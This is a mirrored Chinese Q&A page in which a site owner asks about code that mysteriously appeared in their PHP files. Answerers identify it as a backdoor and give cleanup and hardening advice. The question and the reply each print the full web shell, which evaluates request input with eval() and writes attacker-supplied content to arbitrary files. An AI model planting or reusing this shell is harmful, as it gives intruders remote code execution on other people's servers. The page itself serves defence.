> 백엔드 개발 > PHP 튜토리얼 > PHP文件莫名其妙的被加了代码,看不懂,求解释

PHP文件莫名其妙的被加了代码,看不懂,求解释

WBOY
풀어 주다: 2016-06-06 20:50:30
원래의
1093명이 탐색했습니다.

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>
로그인 후 복사
로그인 후 복사

回复内容:

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>
로그인 후 복사
로그인 후 복사

你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。

第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。

请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。

这是一句话木马。

这就是一句话后门,一眼就看出来了,eval接受的参数可以用来攻击哦!

网站代码、数据目录 “可执行不可写,可写不可执行”,改改权限

관련 라벨:
php
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿